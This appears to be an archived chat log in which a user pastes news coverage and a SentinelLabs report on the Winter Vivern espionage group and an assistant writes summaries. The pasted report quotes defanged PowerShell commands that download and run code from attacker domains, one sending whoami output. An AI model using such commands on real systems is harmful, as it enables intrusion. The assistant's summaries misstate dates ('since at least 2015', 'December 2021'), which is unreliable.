← all conversations

Winter Vivern targets Europe, India, Ukraine

2023-03-1710 turns28,318 charstext-davinci-002-render-sha
cybersecurityapt-groupsespionage

Summary

The user sought detailed information about the Winter Vivern APT group, its targets, and its suspected ties to Russia.

Messages

500 words: Russia-aligned ‘Winter Vivern’ hackers spotted targeting Ukraine, Europe, India A new espionage campaign by a hacking group with suspected ties to Moscow targeted government agencies and telecom operators in Ukraine, India and Europe, researchers said Thursday. The group, known as Winter Vivern, is “highly creative” and operates with limited resources, carefully selecting targets for attacks, according to an analysis by cybersecurity company SentinelOne. The hackers’ activities appear to support the interests of the Russian and Belarusian governments, especially in relation to the ongoing war in Ukraine, the report says. Winter Vivern recently targeted various government agencies and private businesses, including telecom companies supporting Ukraine, SentinelOne said. The list includes Polish government agencies, the foreign ministries of Ukraine and Italy, and individuals in the Indian government. In December, the group also focused on individuals linked to a Ukrainian government website that provides guidance and instructions to Russian and Belarusian soldiers who want to surrender voluntarily during the war in Ukraine. Analysts began to track Winter Vivern in 2021, but the group — classified as an advanced persistent threat (APT) — had been quiet since then, SentinelOne said. Cybersecurity agencies in Poland and Ukraine collaborated with SentinelOne on the latest research, the company said. Fake sites, files and more Winter Vivern hackers used fake websites and distributed malicious documents that were customized to the specific needs of a targeted organization, researchers said. Examples include: • Attempting to infect Ukrainian government computer systems with malware hosted on websites impersonating legitimate state services. • Creating a webpage for credential phishing to target users of the email service used by the Indian government. • Disguising Windows batch files — often used to automate routine tasks or execute a series of commands — as antivirus scanners and using them to download malicious payloads into victims' devices. One of the malware strains delivered in these attacks is called Aperetif. It is hosted on compromised WordPress websites that are commonly used for malware distribution. Ukraine’s Computer Emergency Response Team reported in February that this malware allowed hackers to take screenshots of the victim's computer, scan the desktop folder for files with the specified extensions and exfiltrate user data. A spokesperson for the agency told The Record they could not share details about how many devices were infected or what information was stolen. It is also unclear how successful the group's attacks were and what damage they caused. SentinelOne did not respond Thursday morning to The Record's request for comment. The research report said that organizations directly or indirectly involved in the war should be vigilant against the group’s cyberattacks. “Their ability to lure targets into the attacks and their targeting of governments and high-value private businesses demonstrate the level of sophistication and strategic intent in their operations,” the researchers said. Experts have warned lately about the potential for Russia-aligned hacking campaigns to increase in intensity as the war in Ukraine drags on.
A hacking group believed to have ties to Moscow has launched a new espionage campaign, targeting government agencies and telecom operators in Ukraine, India, and Europe. The group, known as Winter Vivern, is said to be "highly creative" and operate with limited resources, carefully selecting targets for attacks. Their activities appear to support the interests of the Russian and Belarusian governments, especially in relation to the ongoing war in Ukraine. Winter Vivern recently targeted various government agencies and private businesses, including telecom companies supporting Ukraine. The list includes Polish government agencies, the foreign ministries of Ukraine and Italy, and individuals in the Indian government. In December, the group also focused on individuals linked to a Ukrainian government website that provides guidance and instructions to Russian and Belarusian soldiers who want to surrender voluntarily during the war in Ukraine. The group has been classified as an advanced persistent threat (APT), and analysts began tracking Winter Vivern in 2021. Cybersecurity agencies in Poland and Ukraine collaborated with cybersecurity company SentinelOne on the latest research. Winter Vivern hackers used fake websites and distributed malicious documents that were customized to the specific needs of a targeted organization. The group also disguised Windows batch files as antivirus scanners and used them to download malicious payloads into victims' devices. One of the malware strains delivered in these attacks is called Aperetif, which allowed hackers to take screenshots of the victim's computer, scan the desktop folder for files with specified extensions, and exfiltrate user data. It is unclear how successful the group's attacks were and what damage they caused. Organizations directly or indirectly involved in the war are being urged to be vigilant against Winter Vivern's cyberattacks. "Their ability to lure targets into the attacks and their targeting of governments and high-value private businesses demonstrate the level of sophistication and strategic intent in their operations," the researchers said. Experts have warned lately about the potential for Russia-aligned hacking campaigns to increase in intensity as the war in Ukraine drags on. Winter Vivern's activities show that these concerns are not unfounded, and it is important for organizations to take steps to protect themselves from these types of cyberattacks.
text-davinci-002-render-sha
Who is Winter Vivern? 500 words
Winter Vivern is a hacking group that has been active since at least 2015 and is believed to have ties to Russia. The group is classified as an advanced persistent threat (APT), which means they use sophisticated techniques to target their victims and remain undetected for long periods of time. According to cybersecurity company SentinelOne, Winter Vivern is "highly creative" and operates with limited resources, carefully selecting targets for attacks. Their activities appear to support the interests of the Russian and Belarusian governments, especially in relation to the ongoing war in Ukraine. Winter Vivern has targeted various government agencies and private businesses in Ukraine, India, and Europe. They have used a variety of tactics to infiltrate their targets, including fake websites and distributed malicious documents that are customized to the specific needs of the targeted organization. One of the malware strains delivered in these attacks is called Aperetif, which allows hackers to take screenshots of the victim's computer, scan the desktop folder for files with specified extensions, and exfiltrate user data. The group also disguises Windows batch files as antivirus scanners and uses them to download malicious payloads into victims' devices. Winter Vivern has also been known to use social engineering techniques to trick their targets into revealing sensitive information. For example, they created a webpage for credential phishing to target users of the email service used by the Indian government. In December 2021, the group focused on individuals linked to a Ukrainian government website that provides guidance and instructions to Russian and Belarusian soldiers who want to surrender voluntarily during the war in Ukraine. This suggests that Winter Vivern's activities are directly related to the ongoing conflict in the region. It is unclear how successful Winter Vivern's attacks have been and what damage they have caused. However, cybersecurity experts warn that the potential for Russia-aligned hacking campaigns to increase in intensity as the war in Ukraine drags on is a cause for concern. Winter Vivern's activities show that these concerns are not unfounded, and it is important for organizations to take steps to protect themselves from these types of cyberattacks. The group's ability to lure targets into the attacks and their targeting of governments and high-value private businesses demonstrate the level of sophistication and strategic intent in their operations. In conclusion, Winter Vivern is a highly sophisticated hacking group with suspected ties to Russia. The group has been targeting government agencies and private businesses in Ukraine, India, and Europe, using a variety of tactics to infiltrate their targets. Their activities appear to support the interests of the Russian and Belarusian governments, especially in relation to the ongoing conflict in Ukraine. The potential for Russia-aligned hacking campaigns to increase in intensity as the war in Ukraine drags on is a cause for concern, and organizations should take steps to protect themselves from these types of cyberattacks.
text-davinci-002-render-sha
Winter Vivern APT Group Targeting Indian, Lithuanian, Slovakian, and Vatican Officials Mar 17, 2023Ravie LakshmananCyber Attack / Cyber Espionage APT Group The advanced persistent threat known as Winter Vivern has been linked to campaigns targeting government officials in India, Lithuania, Slovakia, and the Vatican since 2021. The activity targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government, SentinelOne said in a report shared with The Hacker News. "Of particular interest is the APT's targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war," senior threat researcher Tom Hegel said. Winter Vivern, also tracked as UAC-0114, drew attention last month after the Computer Emergency Response Team of Ukraine (CERT-UA) detailed a new malware campaign aimed at state authorities of Ukraine and Poland to deliver a piece of malware dubbed Aperetif. Previous public reports chronicling the group show that it has leveraged weaponized Microsoft Excel documents containing XLM macros to deploy PowerShell implants on compromised hosts. While the origins of the threat actor are unknown, the attack patterns suggest that the cluster is aligned with objectives that support the interests of Belarus and Russia's governments. UAC-0114 has employed a variety of methods, ranging from phishing websites to malicious documents, that are tailored to the targeted organization to distribute its custom payloads and gain unauthorized access to sensitive systems. In one batch of attacks observed in mid-2022, Winter Vivern set up credential phishing web pages to lure users of the Indian government's legitimate email service email.gov[.]in. Typical attack chains involve using batch scripts masquerading as virus scanners to trigger the deployment of the Aperetif trojan from actor-controlled infrastructure such as compromised WordPress sites. Aperetif, a Visual C++-based malware, comes with features to collect victim data, maintain backdoor access, and retrieve additional payloads from the command-and-control (C2) server. "The Winter Vivern APT is a resource-limited but highly creative group that shows restraint in the scope of their attacks," Hegel said. "Their ability to lure targets into the attacks, and their targeting of governments and high-value private businesses demonstrate the level of sophistication and strategic intent in their operations." While Winter Vivern may have managed to evade the public eye for extended periods of time, one group that's not too concerned about staying under the radar is Nobelium, which shares overlaps with APT29 (aka BlueBravo, Cozy Bear, or The Dukes). The Kremlin-backed nation-state group, notorious for the SolarWinds supply chain compromise in December 2020, has continued to evolve its toolset, developing new custom malware like MagicWeb and GraphicalNeutrino. It has also been attributed to yet another phishing campaign directed against diplomatic entities in the European Union, with specific emphasis on agencies that are "aiding Ukrainian citizens fleeing the country, and providing help to the government of Ukraine." "Nobelium actively collects intelligence information about the countries supporting Ukraine in the Russia-Ukraine war," BlackBerry said. "The threat actors carefully follow geopolitical events and use them to increase their possibility of a successful infection." The phishing emails, spotted by the company's research and intelligence team, contain a weaponized document that includes a link pointing to an HTML file. WEBINAR Discover the Hidden Dangers of Third-Party SaaS Apps Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk. RESERVE YOUR SEAT The weaponized URLs, hosted on a legitimate online library website based in El Salvador, features lures related to LegisWrite and eTrustEx, both of which are used by E.U. nations for secure document exchange. The HTML dropper (dubbed ROOTSAW or EnvyScout) delivered in the campaign embeds an ISO image, which, in turn, is designed to launch a malicious dynamic link library (DLL) that facilitates the delivery of a next-stage malware via Notion's APIs. The use of Notion, a popular note-taking application, for C2 communications was previously revealed by Recorded Future in January 2023. It's worth noting that APT29 has employed various online services like Dropbox, Google Drive, Firebase, and Trello in an attempt to evade detection. "Nobelium remains highly active, executing multiple campaigns in parallel targeting government organizations, non-governmental organizations (NGOs), intergovernmental organizations (IGOs), and think tanks across the U.S., Europe, and Central Asia," Microsoft stated last month. The findings also come as enterprise security firm Proofpoint disclosed aggressive email campaigns orchestrated by a Russia-aligned threat actor called TA499 (aka Lexus and Vovan) since early 2021 to trick targets into participating in recorded phone calls or video chats and extract valuable information. "The threat actor has engaged in steady activity and expanded its targeting to include prominent businesspeople and high-profile individuals that have either made large donations to Ukrainian humanitarian efforts or those making public statements about Russian disinformation and propaganda," the company said.
Winter Vivern is an advanced persistent threat (APT) group that has been active since 2021 and
text-davinci-002-render-sha
ADVANCED PERSISTENT THREAT Winter Vivern | Uncovering a Wave of Global Espionage TOM HEGEL / MARCH 16, 2023 Executive Summary SentinelLabs has conducted an investigation into Winter Vivern Advanced Persistent Threat (APT) activity, leveraging observations made by The Polish CBZC and Ukraine CERT. Our research has uncovered a previously unknown set of espionage campaigns and targeting activities conducted by this threat actor. Our analysis indicates that Winter Vivern’s activities are closely aligned with global objectives that support the interests of Belarus and Russia’s governments. The APT has targeted a variety of government organizations, and in a rare instance, a private telecommunication organization. The threat actor employs various tactics, such as phishing websites, credential phishing, and deployment of malicious documents, that are tailored to the targeted organization’s specific needs. This results in the deployment of custom loaders and malicious documents, which enable unauthorized access to sensitive systems and information. Background on Winter Vivern The Winter Vivern Advanced Persistent Threat (APT) is a noteworthy yet relatively underreported group that operates with pro-Russian objectives. DomainTools initially publicized the group in early 2021, naming it based on an initial command-and-control beacon URL string “wintervivern,” which is no longer in use. Subsequently, Lab52 shared additional analysis several months later, identifying new activity associated with Winter Vivern. The group has avoided public disclosure since then, until recent attacks targeting Ukraine. A part of a Winter Vivern campaign was reported in recent weeks by the Polish CBZC, and then the Ukraine CERT as UAC-0114. In this activity, CERT-UA and the CBZC collaborated on the release of private technical details which assisted in our research to identify a wider set of activity on the threat actor, in addition to new victims and previously unknown specific technical details. Overall, we find that the Winter Vivern APT is a resource-limited but highly creative group that shows restraint in the scope of their attacks. Our analysis indicates that Winter Vivern activity aligns closely with global objectives that support the interests of Belarus and Russia’s governments. Targeted Organizations Our analysis of Winter Vivern’s past activity indicates that the APT has targeted various government organizations since 2021, including those in Lithuania, India, Vatican, and Slovakia. Recently linked campaigns reveal that Winter Vivern has targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government. Of particular interest is the APT’s targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war. The threat actor’s targeting of a range of government and private entities highlights the need for increased vigilance as their operations include a global set of targets directly and indirectly involved in the war. Luring Methodology Winter Vivern’s tactics have included the use of malicious documents, often crafted from authentic government documents publicly available or tailored to specific themes. More recently, the group has utilized a new lure technique that involves mimicking government domains to distribute malicious downloads. In early 2023, Winter Vivern targeted specific government websites by creating individual pages on a single malicious domain that closely resembled those of Poland’s Central Bureau for Combating Cybercrime, the Ukraine Ministry of Foreign Affairs, and the Security Service of Ukraine. Malicious Page Mimicking cbzc.policja.gov.pl Malicious Page Mimicking cbzc.policja.gov.pl In mid 2022 the attackers also made an interesting, lesser observed, use of government email credential phishing webpages. One example is ocspdep[.]com, which was used in targeting users of the Indian government’s legitimate email service email.gov.in. email.gov.in Login Page email.gov.in Login Page Looking back at less recent activity, we can see in December 2022 the group likely targeted individuals associated with the Hochuzhit.com (“I Want to Live”) project, the Ukraine government website offering guidance and instructions to Russian and Belarus Armed Forces seeking to voluntarily surrender in the war. In these attacks the threat actor made use of a macro-enabled Excel spreadsheet to infect the target. When the threat actor seeks to compromise the organization beyond the theft of legitimate credentials, Winter Vivern tends to rely on shared toolkits, and the abuse of legitimate Windows tools. View Into The Arsenal Winter Vivern APT falls into a category of scrappy threat actors, being quite resourceful and able to accomplish a lot with potentially limited resources while willing to be flexible and creative in their approach to problem-solving. Recent campaigns demonstrate the group’s use of lures to initiate the infection process, utilizing batch scripts disguised as virus scanners to prompt downloads of malware from attacker-controlled servers. Fake Virus Scan Loaders Fake Virus Scan Loaders In the case of malicious documents, such as the Hochu Zhit themed XLS files, PowerShell is called through a macro. Specifically, Invoke-Expression cmdlet is executed, beaconing to the malicious destination of ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php. powershell.exe -noexit -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; iex (new-object net.webclient).DownloadString('hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php')" One malware family of recent activity is APERETIF, named by CERT-UA based on the development PDB path inside the sample. We identified a related sample following similar use, although it is less complete in malicious design. These samples align with the theme of attacks mimicking a virus scanner, presenting users with the fake scan results similar to the script loaders. Known samples are PE32 executables, written in Visual C++, with a compilation timestamp of May 2021. We assess the threat actor shifted from these original executables to the delivery of batch files with PowerShell scripting, with overlap in their use. f39b260a9209013d9559173f12fbc2bd5332c52a C:\Users\user_1\source\repos\Aperitivchick\Release\SystemProtector.pdb a19d46251636fb46a013c7b52361b7340126ab27 C:\Users\user_1\source\repos\Aperitivchick 2\Release\SystemProtector.pdb APERETIF is a trojan, automating the collection of victim details, maintaining access, and beaconing outbound the actor-controlled domain marakanas[.]com. As with the previous script, the trojan makes use of whomami within PowerShell in its initial activity to beacon outbound for further instructions and/or downloads. actor-controlled.exe -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $a=whoami; iex (New-Object Net.WebClient).DownloadString("""hxxps://marakanas[.]com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php?idU=$a""")" APERETIF also uses the signatures.php?id=1 URI through HTTPS GET requests. The group made use of compromised WordPress websites to host the malware, such as with hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i and hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o serving as the download location for APERETIF during initial attack stages. Moreover, Winter Vivern employs other intrusion techniques, such as exploiting application vulnerabilities to compromise specific targets or staging servers. An attacker-controlled server was found to host a login page for the Acunetix web application vulnerability scanner, which may serve as a supplementary resource for scanning target networks and potentially used to compromise WordPress sites for malware hosting purposes. Acunetix Vulnerability Scanner Login Acunetix Vulnerability Scanner Login Conclusion The Winter Vivern cyber threat actor, whose operations of espionage have been discussed in this research, has been able to successfully carry out their attacks using simple yet effective attack techniques and tools. Their ability to lure targets into the attacks, and their targeting of governments and high-value private businesses demonstrate the level of sophistication and strategic intent in their operations. The dynamic set of TTPs and their ability to evade the public eye has made them a formidable force in the cyber domain. Indicators of Compromise Type Indicator Domain bugiplaysec[.]com Domain marakanas[.]com Domain mfa_it_sec@outlook[.]com Domain ocs-romastassec[.]com Domain ocspdep[.]com Domain security-ocsp[.]com Domain troadsecow[.]com URL hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i URL hxxps://marakanas[.]com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php URL hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o URL hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php IP 176.97.66[.]57 IP 179.43.187[.]175 IP 179.43.187[.]207 IP 195.54.170[.]26 IP 80.79.124[.]135 File SHA1 0fe3fe479885dc4d9322b06667054f233f343e20 File SHA1 83f00ee38950436527499769db5c7ecb74a9ea41 File SHA1 a19d46251636fb46a013c7b52361b7340126ab27 File SHA1 a574c5d692b86c6c3ee710af69fccbb908fe1bb8 File SHA1 c7fa6727fe029c3eaa6d9d8bd860291d7e6e3dd0 File SHA1 f39b260a9209013d9559173f12fbc2bd5332c52a
What is Winter Vivern APT and what organizations has it
text-davinci-002-render-sha
1000 words, Who is Winter Vivern?
Winter Vivern is an Advanced Persistent Threat (APT) group that operates with pro-Russian objectives. The group's activities have been uncovered through an investigation by SentinelLabs, leveraging observations made by The Polish CBZC and Ukraine CERT. The analysis indicates that Winter Vivern's activities are closely aligned with global objectives that support the interests of Belarus and Russia's governments. The group has targeted various government organizations since 2021, including those in Lithuania, India, Vatican, and Slovakia. Recently, Winter Vivern has targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government. The APT has also targeted private businesses, including telecommunications organizations that support Ukraine in the ongoing war. Winter Vivern is a resource-limited but highly creative group that shows restraint in the scope of their attacks. The group employs various tactics tailored to the targeted organization's specific needs, such as phishing websites, credential phishing, and deployment of malicious documents, resulting in the deployment of custom loaders and malicious documents that enable unauthorized access to sensitive systems and information. Winter Vivern's tactics have included the use of malicious documents, often crafted from authentic government documents publicly available or tailored to specific themes. The group has also utilized a new lure technique that involves mimicking government domains to distribute malicious downloads. The APT has targeted specific government websites by creating individual pages on a single malicious domain that closely resembled those of Poland's Central Bureau for Combating Cybercrime, the Ukraine Ministry of Foreign Affairs, and the Security Service of Ukraine. In mid-2022, the attackers made use of government email credential phishing webpages, such as ocspdep[.]com, which was used in targeting users of the Indian government's legitimate email service email.gov.in. In December 2022, the group likely targeted individuals associated with the Hochuzhit.com project, the Ukraine government website offering guidance and instructions to Russian and Belarus Armed Forces seeking to voluntarily surrender in the war. In these attacks, the threat actor made use of a macro-enabled Excel spreadsheet to infect the target. When the threat actor seeks to compromise the organization beyond the theft of legitimate credentials, Winter Vivern tends to rely on shared toolkits and the abuse of legitimate Windows tools. Recent campaigns demonstrate the group's use of lures to initiate the infection process, utilizing batch scripts disguised as virus scanners to prompt downloads of malware from attacker-controlled servers. Winter Vivern APT falls into a category of scrappy threat actors, being quite resourceful and able to accomplish a lot with potentially limited resources while willing to be flexible and creative in their approach to problem-solving. One malware family of recent activity is APERETIF, named by CERT-UA based on the development PDB path inside the sample. The group's arsenal includes various tools and techniques, such as PowerShell scripts, fake virus scan loaders, and batch scripts, to infect targets and gain unauthorized access to sensitive systems and information. In conclusion, Winter Vivern is a relatively unknown but highly effective APT group with pro-Russian objectives that has targeted various government organizations and private businesses since 2021. The group employs various tactics tailored to the targeted organization's specific needs and shows restraint in the scope of their attacks. Winter Vivern's arsenal includes various tools and techniques, such as PowerShell scripts, fake virus scan loaders, and batch scripts, to gain unauthorized access to sensitive systems and information. The group's activities align closely with global objectives that support the interests of Belarus and Russia's governments. Increased vigilance is needed to prevent further attacks from this APT group.
text-davinci-002-render-sha